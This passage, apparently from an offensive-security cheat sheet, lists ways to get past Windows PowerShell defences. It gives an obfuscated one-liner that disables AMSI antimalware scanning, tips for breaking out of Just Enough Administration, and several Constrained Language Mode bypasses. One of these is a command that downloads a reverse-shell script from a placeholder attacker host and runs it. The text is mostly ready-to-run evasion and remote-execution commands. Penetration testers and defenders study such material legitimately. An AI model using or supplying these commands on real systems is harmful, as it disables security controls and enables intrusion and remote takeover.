Control + + +## DPAPI + +Refer to [PayloadsAllTheThings/Windows - DPAPI.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20DPAPI.md) + + +## Powershell + +### Anti Malware Scan Interface + +> The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content. + +Find more AMSI bypass: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md) + +```powershell +PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) +``` + + +### Just Enough Administration + +> Just-Enough-Administration (JEA) is a feature in Microsoft Windows Server that allows administrators to delegate specific administrative tasks to non-administrative users. JEA provides a secure and controlled way to grant limited, just-enough access to systems, while ensuring that the user cannot perform unintended actions or access sensitive information. + +Breaking out if JEA: +* List available cmdlets: `command` +* Look for non-default cmdlets: + ```ps1 + Set-PSSessionConfiguration + Start-Process + New-Service + Add-Computer + ``` + + +### Constrained Language Mode + +Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode` + +* Bypass using an old Powershell. Powershell v2 doesn't support CLM. + ```ps1 + powershell.exe -version 2 + powershell.exe -version 2 -ExecutionPolicy bypass + powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')" + ``` + +* Bypass when `__PSLockDownPolicy` is used. Just put "System32" somewhere in the path. + ```ps1 + # Enable CLM from the environment + [Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine') + Get-ChildItem -Path Env: + + # Create a check-mode.ps1 containing your "evil" powershell commands + $mode = $ExecutionContext.SessionState.LanguageMode + write-host $mode + + # Simple bypass, execute inside a System32 folder + PS C:\> C:\Users\Public\check-mode.ps1 + ConstrainedLanguage + + PS C:\> C:\Users\Public\System32\check-mode.ps1 + FullLanguagge + ``` + +* Bypass using COM: [xpn/COM_to_registry.ps1](https://gist.githubusercontent.com/xpn/1e9e879fab3e9ebfd236f5e4fdcfb7f1/raw/ceb39a9d5b0402f98e8d3d9723b0bd19a84ac23e/COM_to_registry.ps1) +* Bypass using your own Powershell DLL: [p3nt4/PowerShdll](https://github.com/p3nt4/PowerShdll) & [iomoath/PowerShx](https://github.com/iomoath/PowerShx) + ```ps1 + rundll32 PowerShdll,main